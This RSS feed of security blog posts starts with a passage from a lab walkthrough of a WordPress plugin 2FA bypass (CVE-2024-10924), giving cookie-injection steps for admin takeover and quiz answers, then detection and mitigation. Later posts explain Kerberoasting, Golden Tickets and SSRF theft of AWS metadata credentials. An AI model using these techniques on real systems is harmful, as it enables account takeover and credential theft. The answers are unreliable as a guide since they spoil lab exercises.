Cookie Value: admin|<span class="hljs-number">1734510575</span>|oROXr3wB4mKDymD0koHZenGeStwYsqZbMcWqOlm4QI2|c29b74eaa
</code></pre>
<p>The above script sends a POST request to the WordPress endpoint and retrieves the authenticated cookie values for the specified <code>user_id</code>, with 1 typically being assigned to the first user on the website.</p>
<p><strong>Note</strong>: The cookie values in the output above are intentionally omitted for the <code>user_id</code> 1.</p>
<h2 id="heading-from-cookies-to-admin-login">From Cookies to Admin Login</h2>
<p>Now, we will use the cookies retrieved earlier to log in as admin on the WordPress site. While on the <code>vulnerablewp.thm:8080</code> page, you can manually inject the cookies into Firefox. To do this, right-click on the page and select <strong>Inspect</strong>, then open the browser's developer tools.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733311257718.png" alt="Accessing dev console through inspect element." /></p>
<p>Once the <strong>Developer</strong> Tools panel is open, look for the <strong>Storage</strong> tab at the top. Click on it to access the storage-related data. Locate and expand the <strong>Cookies</strong> section on the left-hand sidebar of the <strong>Storage</strong> tab. Under <strong>Cookies</strong>, you will see a list of domains for which cookies are stored. Select <code>http://vulnerablewp.thm:8080</code> from this list to view all cookies associated with the site.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733311290844.png" alt="Adding cookies in Firefox." /></p>
<p>With the cookies table visible, you can now add the cookies retrieved earlier. To do this, click on the plus sign (+) and a new row will appear in the table. Start by double-clicking the empty <code>Name</code> field in the new row and paste the name of the cookie, such as <code>wordpress_logged_in_xxx</code>. After pasting the cookie name, double-click the empty <code>Value</code> field and paste the cookie value you retrieved earlier. For example, a typical value might look like <code>admin|1734424855|GmsuEza35K2GtvS57bhIVl5CbFZKVlpuYxEbIYVLk4</code>. Repeat the same step for the other cookie as well. A simple visual representation for adding a cookie <code>test</code> with the value of  <code>value</code> is shown below:</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733313998824.gif" alt="Steps to add cookie in browser" /></p>
<p>After adding the cookies, close the Developer Tools panel, enter the WordPress admin dashboard link <code>http://vulnerablewp.thm:8080/wp-admin</code> in the address bar, and press Enter. This will apply the injected cookies to your session. When the page reloads, you should be logged in as the <strong>user_id</strong> 1. If everything was done correctly, you will see the admin interface as shown below:</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733315520660.png" alt="Dashboard after logging in wordpress." /></p>
<p>Once logged in as the <strong>user_id</strong> 1, navigate to <a target="_blank" href="http://vulnerablewp.thm:8080/wp-admin/profile.php">this</a> link to get details about your profile, such as your username, email address, and personal settings.</p>
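<p>If you prefer the command line to the browser UI, the same two cookies can be packed into a single <code>Cookie</code> header. A small sketch (the names and values below are the placeholder ones from the terminal output above):</p>

```python
# Build a Cookie header from the pairs printed by exploit.py.
# Names/values here are placeholders in the same shape as the output above.
cookies = {
    "wordpress_logged_in_eb51341dc89ca85477118d98a618ef6f": "admin|1734510575|oROXr3wB4mKDymD0koHZenGeStwYsqZbMcWqOlm4QI",
    "wordpress_eb51341dc89ca85477118d98a618ef6f": "admin|1734510575|oROXr3wB4mKDymD0koHZenGeStwYsqZbMcWqOlm4QI2|c29b74eaa",
}
header = "; ".join(f"{name}={value}" for name, value in cookies.items())
print("Cookie:", header)
# Usable e.g. as: curl -H "Cookie: <header>" http://vulnerablewp.thm:8080/wp-admin/
```
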
<h2 id="heading-adding-cookies-in-browers">Adding Cookies in Browsers</h2>
<p>There are multiple ways to add cookies in the browser. If you have difficulty using the above method, you can add cookies to the browser using an extension like <strong>Cookiebro Editor</strong>. Follow the steps provided in the extension below to add or edit cookies. Ensure the expiration date for the cookies is set to a future value to keep them valid.</p>
<p></p><details><summary>Click here to watch the walkthrough for injecting cookies using a super easy Firefox extension!</summary><div data-type="detailsContent"></div></details><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733344502509.gif" alt /><p></p>
<p>Now that you understand how to exploit the vulnerability, let's review some mitigation measures for prevention.</p>
<p>Answer the questions below</p>
<p>What email address is associated with the username admin (<strong>user_id</strong> 1)?</p>
<p><code>admin@fake.thm</code></p>
<p>Run the <code>exploit.py</code> script with argument <code>1</code>, open the cookie storage in the browser dev console, add the two new cookies for <code>admin</code>, then visit the <code>/wp-admin</code> endpoint.</p>
<p>What is the first name value for the username tesla (<strong>user_id</strong> 2)?</p>
<p><code>Jack</code></p>
<p>While still logged in, open the cookie storage again and run <code>exploit.py</code> with <code>2</code> as the argument for the <code>tesla</code> user, update the cookies, then refresh the dashboard to enter the <code>tesla</code> dashboard; go to the profile page and get the first name!</p>
<p>What is the HTTP method required for exploiting the vulnerability? (GET/POST)</p>
<p><code>POST</code></p>
<p>See the exploit script above.</p>
<p>In the previous task, we learned that the vulnerability in CVE-2024-10924 can be exploited by making a simple API call to a specific endpoint. Now, we will discuss a few detection and mitigation techniques. The challenge lies in detecting such exploitation, as legitimate API calls to the endpoint can also occur, making distinguishing between normal and malicious activity difficult.</p>
<h2 id="heading-examining-logs">Examining Logs</h2>
<p>To identify exploitation attempts of CVE-2024-10924, we can rely on various logs that capture API activity, events, etc. Below are some methods to examine logs for potential exploitation:</p>
<ul>
<li><p><strong>Check Web Logs for API Calls</strong>: Focus on detecting requests to the vulnerable endpoint, <code>/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding</code>, with unusual patterns such as repeated POST requests or requests with varying <code>user_id</code> or <code>login_nonce</code> parameters that indicate brute-force attempts.</p>
</li>
<li><p><strong>Analyse Authentication Logs</strong>: Look for login attempts where <strong>two-factor authentication</strong> is bypassed. Indicators of potential exploitation include failed login attempts followed by a sudden successful login without 2FA validation, logins to administrative accounts from unexpected geolocations or devices, etc.</p>
</li>
<li><p><strong>SIEM Query</strong>: If you are using a <strong>SIEM solution</strong> like OpenSearch, create a query to filter and visualise logs for potential exploitation attempts. A sample query could be:</p>
</li>
</ul>
<pre><code class="lang-c">method:POST AND path:<span class="hljs-string">"/reallysimplessl/v1/two_fa/skip_onboarding"</span>
</code></pre>
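<p>The same filter can be applied directly to web-server access logs. A small sketch (helper names are my own, and the log lines are invented samples in combined log format) that flags POST requests to the vulnerable route:</p>

```python
import re

# Match POST requests whose request line contains the vulnerable route;
# with pretty permalinks off it appears in the rest_route query parameter.
SUSPECT = re.compile(r'"POST [^"]*reallysimplessl/v1/two_fa/skip_onboarding[^"]*"')

def suspicious_lines(log_lines):
    # Return only the lines that hit the vulnerable endpoint via POST
    return [line for line in log_lines if SUSPECT.search(line)]

logs = [  # invented sample entries
    '10.0.0.5 - - [01/Dec/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Dec/2024:10:00:01 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 143',
]
print(suspicious_lines(logs))
```

<p>As with the SIEM query, a match alone is not proof of compromise; correlate the source IPs and timestamps with authentication logs before concluding anything.</p>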
<p><strong>Note</strong>: If the above query generates results, it does not necessarily confirm exploitation. However, when combined with other indicators, like previous suspicious requests, it can provide better insight into potential attacks.</p>
<h2 id="heading-mitigation-steps">Mitigation Steps</h2>
<p>As part of the mitigation process, the developers of the Really Simple Security plugin have officially released a <a target="_blank" href="https://github.com/Really-Simple-Plugins/really-simple-ssl/blob/master/">patch</a> addressing CVE-2024-10924. A source code review of the updated version reveals that additional validation and error-handling steps have been implemented to handle the authentication bypass.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733226774594.png" alt="Mitigation steps added by plugin developers." /></p>
<p>Here are some additional mitigation measures to secure your website:</p>
<ul>
<li><strong>Apply the Official Patch</strong>: Update the Really Simple Security plugin to version 9.1.2 or later, which includes a fix for the vulnerability, and enable <strong>auto updates</strong>.</li>
</ul>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733227110737.png" alt="Auto-update feature in WordPress." /></p>
<ul>
<li><p>Update the alerts in the SIEM so you are notified as soon as an exploitation attempt is made.</p>
</li>
<li><p>Developers must implement proper input validation and rigorous error handling for all API endpoints to prevent the processing of malicious or invalid parameters.</p>
</li>
</ul>
<p>Answer the questions below</p>
<p>As a security engineer, you have identified a call to the <strong>/reallysimplessl/v1/two_fa/skip_onboarding</strong> endpoint from web logs. Does that confirm that the user is 100% infected? (yea/nay)</p>
<p><code>nay</code></p>
<p>I have understood the detection and mitigation techniques.</p>
<p>This is it.</p>
<p>As WordPress is one of the most widely used CMS platforms and its plugins are frequent targets for attackers, it is highly recommended that all plugins, including Really Simple Security, be updated to avoid exploitation of such vulnerabilities.</p>
<p>In this room, we covered the following:</p>
<ul>
<li><p>The workings of the critical vulnerability in the Really Simple Security plugin (CVE ID 2024-10924).</p>
</li>
<li><p>How attackers can exploit the vulnerability to bypass two-factor authentication and gain unauthorised access using crafted API calls.</p>
</li>
<li><p>Methods to detect exploitation attempts in logs, including web server logs and SIEM tools.</p>
</li>
<li><p>Effective mitigation strategies, including patching the plugin and following secure coding practices.</p>
</li>
</ul>
<p>Let us know what you think about this room on our <a target="_blank" href="https://discord.gg/tryhackme">Discord channel</a> or <a target="_blank" href="http://twitter.com/realtryhackme">X account</a>. If you liked this room, feel free to look at our <a target="_blank" href="https://tryhackme.com/module/authentication">Authentication</a> module, which covers advanced techniques to bypass authentication mechanisms.</p>
]]></content:encoded></item><item><title><![CDATA[Active Directory: Hell-bent on Kerberos]]></title><description><![CDATA[Sounds darn good
I know right? It’s equally much of a headache. Kerberos is an authentication protocol that’s made and maintained by MIT and used in numerous applications like in Windows Active Directory. Kerberos was derived from the greek word “Cer...]]></description><link>https://blog.berzi.one/hell-bent-on-kerberos</link><guid isPermaLink="true">https://blog.berzi.one/hell-bent-on-kerberos</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Tue, 21 Jan 2025 07:28:28 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961558319/a9fbc22c-2c21-41fa-a190-9432c975bb5c.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-sounds-darn-good">Sounds darn good</h2>
<p>I know right? It’s equally much of a headache. Kerberos is an authentication protocol that’s made and maintained by MIT and used in numerous applications, such as Windows Active Directory. The name Kerberos comes from the Greek “Kerberos”, Latinised as “Cerberus”.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">In Greek mythology, Cerberus, often referred to as the hound of Hades, is a multi-headed dog that guards the gates of the underworld to prevent the dead from leaving.<a target="_self" class="y171A xmq3o Q7PwXb a-no-hover-decoration" href="https://en.wikipedia.org/wiki/Cerberus"> Wikipedia</a></div>
</div>

<h2 id="heading-wait-whats-active-directory">Wait, what’s Active Directory?</h2>
<h3 id="heading-some-basic-terms-and-objects">Some Basic Terms and Objects</h3>
<p>Active Directory is a central repository that centralises the administration of Windows machines within a Domain (a network). Active Directory Domain Services holds info for all objects in the network. What’s an object? Users, Groups, Machines, the usual deal.</p>
<p>Types of objects include security principals (which can be authenticated by the domain and can be assigned permissions over resources) and machines (saved as &lt;machine_name&gt;$).</p>
<p>Security groups are groups of security principals (and are themselves considered security principals!). Here’s a priority-wise list of security groups…</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737381591731/b531a147-6892-4695-9e4d-5edf4bf299f0.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-organisational-units">Organisational units</h3>
<p>Organisational units group users and machines with similar permission sets. The default containers include:</p>
<ol>
<li><p>builtin (default groups)</p>
</li>
<li><p>computers</p>
</li>
<li><p>DCs</p>
</li>
<li><p>user</p>
</li>
<li><p>managed service accounts (every resource requires a service account)</p>
</li>
</ol>
<p><img src="https://theitbros.com/wp-content/uploads/2023/09/how-to-create-ou-in-active-directory.png" alt="Active Directory OU (Organizational Unit): Ultimate Guide – TheITBros" /></p>
<p>Security groups are used to grant permissions collectively, while OUs group objects that share similar permissions. By searching for Group Policy in the Windows Start menu, you can set policies for multiple groups.</p>
<h3 id="heading-trees-forests-subdomaining">Trees, Forests, Subdomaining</h3>
<p>Trees create subdomains out of an existing domain; a forest is a collection of trees. Interconnected trees need to have a trust policy (which can be either a one-way or two-way trust).</p>
<p><img src="https://fidelissecurity.com/wp-content/uploads/2024/05/Active-Directory-Structure.webp" alt="5 Common Mistakes in AD Recovery and How to Avoid Them | Fidelis Security" /></p>
<h2 id="heading-setting-up-a-local-lab">Setting up a Local lab</h2>
<p>You’ll need at least 16 GB of RAM and at least 256 GB of SSD storage; if that’s not possible locally, consider a cloud-based setup on Azure/AWS.</p>
<p>Here’s what you’ll need:</p>
<ol>
<li><p>Windows Server 2019</p>
</li>
<li><p>At least two Windows 10 Enterprise edition VMs</p>
</li>
<li><p>One Attackbox VM (like Kali/Parrot)</p>
</li>
</ol>
<p>For the Windows-based VMs, set aside 50-60 GB of disk space each, and 25 GB for the attackbox used to enumerate and exploit your network. The server VM will act as the domain controller, while the Enterprise VMs will act as client machines on the network. Please allocate at least 6 GB of RAM to each and set the network type to NAT.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737381942641/b90a5505-9da5-4f04-b0f5-361bcd51fe92.png" alt class="image--center mx-auto" /></p>
<p>Alright, let’s dive into authentication next!</p>
<h2 id="heading-organs-of-kerberos">Organs of Kerberos</h2>
<p>We have four prime parts in the protocol: the user, the domain controller (consisting of the authentication server and the ticket granting server), and finally the resource or service provider.</p>
<p>The authentication server ensures that an existing and valid user is requesting a service, while the ticket granting server authorises that user’s request for the particular service.</p>
<h3 id="heading-symmetric-keys">Symmetric keys</h3>
<p>Kerberos uses symmetric key cryptography to validate, encrypt and decrypt messages. Here’s a cool chart of the supported algorithms:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737443448803/7ef962d7-70ea-41b4-a493-acb85a0e03cf.png" alt class="image--center mx-auto" /></p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">Symmetric key cryptography is the process of using the same key to encrypt and decrypt a message</div>
</div>

<h3 id="heading-caches-and-key-tables">Caches and key tables</h3>
<p>Users have their own unique user cache that stores the service ticket used to access the service.</p>
<p>The authentication service has a table matching user IDs with their respective client secret keys. The same goes for the ticket granting service.</p>
<p>Meanwhile, the service only holds the service cache which stores the user authenticator message.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">user authenticator is a message that holds the user_id trying to access the resource.</div>
</div>

<h2 id="heading-protocol-workflow">Protocol workflow</h2>
<p><img src="https://cdn.discordapp.com/attachments/725059333871632416/1333061681097605140/IMG-20250121-WA0004.jpg?ex=679d74af&amp;is=679c232f&amp;hm=7d4735f02204049a3a3f33f7a6c81beadf873b4ef0c9013c995c1264ce7731d4&amp;" alt="Kerberos protocol workflow diagram" /></p>
<p>The user sends a request for a “Ticket granting ticket” that can be sent to the TGS to get a service ticket. The auth service matches the user id with the respective client secret key (also ensuring if the user exists) and then sends back the TGT metadata encrypted with the client secret key and the TGT encrypted with the TGS secret key.</p>
<p>The user can only decode and check the acknowledgement in the TGT metadata using the client secret key, which is generated by hashing a string in the format shown in the diagram (&lt;password&gt;&lt;user&gt;@something.com&lt;key version&gt;).</p>
<p>The user sends the user authenticator encrypted with the TGS session key from the TGT metadata, and the TGT which is still encrypted. The TGS now decrypts the TGT and checks the contents through the key stored in the TGS key table.</p>
<p>Now, the user receives the service metadata encrypted with TGS session key (which has a temporary fixed lifetime) along with the service ticket encrypted with a service secret key. Once again, the user can’t view the contents of the service ticket. The TGS session key now is used to help decrypt and acknowledge the service metadata. Finally, the service ticket is sent to the resource along with an User authenticator message encrypted with service session key received from the service meta-data.</p>
<p>Ultimately, we receive the service authentication and finally decrypt it through the service session key. And now we can use the service.</p>
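<p>The key handling in this exchange can be sketched as a toy in Python. The names and the XOR “cipher” below are illustrative stand-ins for the real Kerberos cryptography; the point is simply who can decrypt what:</p>

```python
import hashlib
import os

def derive_key(secret: str) -> bytes:
    # Stand-in for the real string-to-key function (password<user>@realm<kvno>).
    return hashlib.sha256(secret.encode()).digest()

def xor_crypt(data: bytes, key: bytes) -> bytes:
    # Toy symmetric cipher: XOR is its own inverse, like encrypt/decrypt pairs.
    return bytes(d ^ k for d, k in zip(data, key * (len(data) // len(key) + 1)))

client_key = derive_key("hunter2alice@corp.com1")  # only the user and AS know this
tgs_key    = derive_key("tgs-long-term-secret")    # only the AS and TGS know this

# AS reply: the session key wrapped for the client, and the TGT wrapped for the TGS.
session_key = os.urandom(16)
tgt_meta = xor_crypt(session_key, client_key)  # the client can open this
tgt      = xor_crypt(session_key, tgs_key)     # the client cannot open this

# The client recovers the session key; the TGS later recovers the same one from the TGT.
assert xor_crypt(tgt_meta, client_key) == session_key
assert xor_crypt(tgt, tgs_key) == session_key
print("both sides now share the session key")
```

<p>Notice the client never sees inside the TGT; it just forwards the opaque blob, which is exactly what the diagram above shows.</p>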
<h2 id="heading-exploitation-techniques">Exploitation Techniques</h2>
<h3 id="heading-kerberoasting">Kerberoasting</h3>
<p>Kerberoasting exploits the Kerberos authentication process by targeting the service tickets issued by the Ticket Granting Service (TGS). During authentication, the TGS issues a service ticket encrypted with the service account's secret key (derived from its NTLM hash). While the user cannot view the contents of the ticket, the encrypted ticket is sent to the client. In a Kerberoasting attack, the attacker requests service tickets for specific services and captures them. Since the tickets are encrypted with the service's NTLM hash, they can be brute-forced offline to recover the service account's credentials, potentially gaining unauthorized access to privileged accounts.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737465544791/f23ae180-36e3-41c6-ab55-21595a180a0e.png" alt class="image--center mx-auto" /></p>
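<p>The offline brute-force at the heart of Kerberoasting can be illustrated with a small toy. Real attacks use tools like Impacket and hashcat against RC4/AES-encrypted tickets; here the “encryption” is a SHA-256-derived XOR stand-in (and the service password is made up) so the idea stays self-contained:</p>

```python
import hashlib

# Toy stand-in: real tickets are encrypted with a key derived from the
# service account's NTLM hash; we fake the derivation with SHA-256.
def derive_key(password: str) -> bytes:
    return hashlib.sha256(password.encode()).digest()

def toy_encrypt(plaintext: bytes, key: bytes) -> bytes:
    # XOR cipher: applying it twice with the same key decrypts.
    return bytes(p ^ k for p, k in zip(plaintext, key * (len(plaintext) // len(key) + 1)))

# The TGS hands out a service ticket sealed under the service account's key.
service_password = "Summer2024!"  # hypothetical weak password
ticket = toy_encrypt(b"TGS-REP:svc_sql", derive_key(service_password))

# Offline, the attacker tries candidate passwords until the decryption "makes sense".
wordlist = ["password1", "letmein", "Summer2024!", "admin123"]
for guess in wordlist:
    if toy_encrypt(ticket, derive_key(guess)).startswith(b"TGS-REP"):
        print("cracked:", guess)
        break
```

<p>Because the guessing happens entirely offline, no failed-logon events are generated, which is what makes service accounts with weak passwords so dangerous.</p>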
<h3 id="heading-golden-ticketing">Golden Ticketing</h3>
<p>Golden Ticketing is a powerful attack against Kerberos authentication that allows an attacker to create forged Ticket Granting Tickets (TGTs) for any user, including domain administrators, without needing their passwords. This attack exploits the Kerberos Key Distribution Center (KDC) secret, specifically the <strong>KRBTGT account hash</strong>, which is used to sign and encrypt all TGTs in a domain.</p>
<p>Here’s how it works:</p>
<ol>
<li><p><strong>Compromise the KRBTGT Hash</strong>: The attacker must first obtain the KRBTGT account's NTLM hash. This is typically done by gaining elevated privileges, such as Domain Admin access.</p>
</li>
<li><p><strong>Create a Forged TGT</strong>: Using tools like Mimikatz, the attacker creates a fake TGT for any user, embedding any permissions they desire, such as Domain Admin privileges.</p>
</li>
<li><p><strong>Authenticate Using the Forged TGT</strong>: The attacker injects the forged TGT into their session. Since the TGT is signed with the valid KRBTGT hash, the KDC treats it as legitimate, granting access to requested resources.</p>
</li>
</ol>
<p>Golden Ticketing provides attackers with persistent access, as even resetting user passwords won't invalidate the forged tickets. The only way to mitigate this attack is to reset the KRBTGT account password twice, invalidating all existing tickets.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737466107382/9ede2763-91cd-4874-aef2-0c5cbcd2980c.png" alt class="image--center mx-auto" /></p>
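<p>Why the forgery works, and why rotating user passwords doesn’t help, can be shown with another toy sketch. All keys and the cipher here are illustrative stand-ins; real forging is done with tools like Mimikatz:</p>

```python
import hashlib

def derive_key(secret: str) -> bytes:
    return hashlib.sha256(secret.encode()).digest()

def xor_crypt(data: bytes, key: bytes) -> bytes:
    return bytes(d ^ k for d, k in zip(data, key * (len(data) // len(key) + 1)))

krbtgt_key = derive_key("krbtgt-account-hash")  # every TGT is sealed with this

def kdc_accepts(tgt: bytes) -> bool:
    # The KDC's only check in this toy: does the TGT decrypt to a valid claim?
    return xor_crypt(tgt, krbtgt_key).startswith(b"TGT:")

# An attacker who stole the krbtgt key can mint a ticket for any identity.
forged = xor_crypt(b"TGT:Administrator", krbtgt_key)
print(kdc_accepts(forged))  # True: the forgery is indistinguishable from a real TGT

# Resetting the Administrator's password changes nothing above, because the
# forged ticket never involved that password; only rotating krbtgt_key helps.
```

<p>This is exactly why the mitigation is a double reset of the KRBTGT account password rather than user-level resets.</p>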
]]></content:encoded></item><item><title><![CDATA[Hacking your way back into Windows]]></title><description><![CDATA[This article is more like an emergency guide I made for both the readers and myself. The intended audience are those people who wanna install a copy of Windows 10/11 on a fresh SSD/HDD or switch from Linux to Windows in a Dual boot/Clean install conf...]]></description><link>https://blog.berzi.one/hacking-your-way-back-into-windows</link><guid isPermaLink="true">https://blog.berzi.one/hacking-your-way-back-into-windows</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Thu, 16 Jan 2025 13:15:17 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961650511/d310f74b-da76-4618-b570-bb3848ad13b7.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This article is more like an emergency guide I made for both the readers and myself. The intended audience are those people who wanna install a copy of Windows 10/11 on a fresh SSD/HDD or switch from Linux to Windows in a Dual boot/Clean install configuration.</p>
<h2 id="heading-this-wasnt-hacking-until-it-was">This wasn’t Hacking, until it was…</h2>
<p>Why “Hacking”? That’s coz Microsoft loves to make things complicated! Traditional ISO flashers like Balena Etcher and Popsicle nowadays won’t support making a Windows bootable USB. Hence you’re left with the two most efficient methods to create a bootable USB:</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">An ISO, also called the “image file” is a file with an extension of “.iso” that contains the installation wizard to install the specific OS into your system</div>
</div>

<ol>
<li><p>Install Ventoy, flash it into the USB, drag and drop your windows ISO into the USB drive… OR</p>
</li>
<li><p>Create a Windows VM (which is thankfully easy to setup), install Rufus, give the VM access to the USB drive, then flash the ISO into the drive directly through Rufus.</p>
</li>
</ol>
<p>Now we got our USB drive, what next? Drivers! Why? Because Windows won’t detect your drive without them, and without detection, you won’t be able to install your OS! I’ll target two kinds of drivers: one from Intel, and one from AMD.</p>
<h2 id="heading-drivers-driving-us-insane">Drivers driving us insane</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737032398450/f51c6303-a5ec-4049-b07a-7c5e0901b0c9.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737032468051/e3314013-6f76-4378-8094-acb13c0eae9f.png" alt class="image--center mx-auto" /></p>
<p>For either of these, run the respective <code>.exe</code> file on a Windows VM. This will extract the driver files and save them on your system; organise them inside a folder and copy them to a flash drive.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">a VM or a Virtual Machine is an OS that can run over your main OS. These can be managed through hypervisors like VirtualBox and VMWare Pro (Try Googling).</div>
</div>

<h2 id="heading-double-usb-ninja-technique">Double USB ninja technique!!!</h2>
<p>Now you gotta go ninja mode. Plug the first USB drive made bootable with Windows 10, set the boot priority to make sure you boot into the USB drive. After the installation wizard starts, select “Custom Install”, then see if any drives are being detected, if not, click “Load drivers”. You might come across this screen…</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/0*4_SGhxNySIful9_5.png" alt="Troubleshooting windows installation error “No device drivers were found.”  | by Syed Hasan | Medium" /></p>
<p>Now plug in your second flash drive containing the drivers, click “browse”, and then recurse through the files of that flash drive until you reach the “VMD” folder inside the driver files (that’s for Intel’s case at least). Select it, load and you’ll be able to see the drives now! Continue with your installation, and you should smoothly be able to setup Windows 10 from scratch now. (Also, please update your system clock and install Windows Updates to make sure you get the required firmware, security patches and other drivers)</p>
]]></content:encoded></item><item><title><![CDATA[Playing Offense: AWS Edition]]></title><description><![CDATA[Access methods
Before we talk about the services, we need to talk about how authentication is done. One method is through AWS’s own GUI dashboard where you can either login as an IAM user or a root user (basically the dude with admin privileges). Thi...]]></description><link>https://blog.berzi.one/playing-offense-aws-edition</link><guid isPermaLink="true">https://blog.berzi.one/playing-offense-aws-edition</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sat, 04 Jan 2025 14:12:18 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961741390/432e8cb0-699f-40f3-ac93-4ad1b1fc2030.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-access-methods">Access methods</h2>
<p>Before we talk about the services, we need to talk about how authentication is done. One method is through AWS’s own GUI dashboard where you can either login as an IAM user or a root user (basically the dude with admin privileges). This does require stuff like <strong>IAM user ID, email, passwords,</strong> etc.</p>
<p>Whereas when we are dealing with the <strong>AWS CLI</strong> it is much simpler: we have an <strong>Access key ID</strong> and <strong>Secret access key</strong> for long-term access, and an additional <strong>session token</strong> for short-term access.</p>
<h2 id="heading-iam">IAM</h2>
<p><img src="https://digitalcloud.training/wp-content/uploads/2022/02/iam-authentication-methods.png" alt="AWS Identity and Access Management | AWS Cheat Sheet" /></p>
<p>Very similar to Linux, users are nothing but profiles made for individuals; more on that as we progress through this article. IAM stands for Identity and Access Management (which is, in simple terms, managing people and authorisation). <strong>Groups</strong>, on the other hand, are collections of users with defined permissions. Most entities in IAM relate to grouping entities and assigning sets of permissions. We use <strong>IAM roles</strong> to allocate permissions to these users, and when we need temporary access, we use <strong>Assumed Roles</strong>. Now how do we define permissions? We’ve got <strong>policies</strong>: JSON files that define a blueprint of all the permissions you want to allocate to an entity, i.e. which services, and to what extent, that entity can access.</p>
<p>An example policy for full access to AWS S3 buckets:</p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"Version"</span>: <span class="hljs-string">"2012-10-17"</span>,
    <span class="hljs-attr">"Statement"</span>: [
        {
            <span class="hljs-attr">"Effect"</span>: <span class="hljs-string">"Allow"</span>,
            <span class="hljs-attr">"Action"</span>: <span class="hljs-string">"s3:*"</span>,
            <span class="hljs-attr">"Resource"</span>: <span class="hljs-string">"*"</span>
        }
    ]
}
</code></pre>
<h2 id="heading-vulnerabilities">Vulnerabilities</h2>
<p><img src="https://d2908q01vomqb2.cloudfront.net/e1822db470e60d090affd0956d743cb0e7cdf113/2020/11/27/Amazon-S3-Featured-Image.png" alt="Limit access to Amazon S3 buckets owned by specific AWS accounts | AWS  Storage Blog" /></p>
<p>Vulnerabilities in AWS-based sites often start with open S3 buckets (persistent data stores that are often left open for anybody to access). You can get a list of open S3 buckets through various tools online.</p>
<p>Now, we need to figure out how to get access to the buckets. This can be through SSRF, where we can employ various tactics like OS command injection, open redirects, etc. Usually the credentials are exposed at the <code>http://169.254.169.254/latest/meta-data</code> path, whose IP address comes from the reserved <a target="_blank" href="https://en.wikipedia.org/wiki/Link-local_address">IPv4 link-local address space</a> and can only be accessed from within that instance’s network.</p>
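<p>Once the SSRF lands, the metadata service replies with a JSON credentials document. Here’s a small sketch of pulling the useful fields out of such a response; the sample payload below is made up, but the field names match what the instance metadata service returns:</p>

```python
import json

# Hypothetical response from
# http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
sample_response = """{
  "Code": "Success",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAEXAMPLEKEYID",
  "SecretAccessKey": "examplesecretkey",
  "Token": "exampletoken",
  "Expiration": "2025-01-04T20:00:00Z"
}"""

creds = json.loads(sample_response)
# These map directly onto the environment variables the AWS CLI reads:
env = {
    "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
    "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
    "AWS_SESSION_TOKEN": creds["Token"],
}
print(env["AWS_ACCESS_KEY_ID"])  # prints ASIAEXAMPLEKEYID
```

<p>Exporting those three variables is enough to start running CLI commands as the stolen role, at least until the <code>Expiration</code> timestamp passes.</p>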
<h3 id="heading-enumeration-through-llms">Enumeration through LLMs</h3>
<p>Now, once we get the credentials it’s time to authenticate and then view all sorts of IAM users, roles, policies. I’m lazy so I like to form complex queries through LLMs like ChatGPT.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735999587824/09b2940a-c33a-48fd-b157-3c970981e327.png" alt class="image--center mx-auto" /></p>
<p>It is possible to look for privilege escalation chances through the <code>pacu</code> tool. But since the enumerative functions of <code>pacu</code> take too long, sometimes it’s better to manually explore what’s out there through the AWS cli and some Google Dorking.</p>
